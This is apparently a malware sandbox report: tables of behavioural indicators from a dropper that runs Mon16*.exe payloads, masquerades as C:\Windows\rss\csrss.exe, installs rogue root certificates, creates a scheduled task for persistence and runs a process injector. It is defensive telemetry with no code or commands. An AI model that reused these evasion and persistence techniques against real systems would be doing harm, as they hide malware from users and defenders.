Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16d070a064013c841.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon1661118952.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\rss\csrss.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." | C:\Windows\system32\netsh.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace | C:\Windows\system32\netsh.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" | C:\Windows\system32\netsh.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" | C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe | N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [raw certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16bd4a93b822a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-T2V1R.tmp\Mon16957e622fa390.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
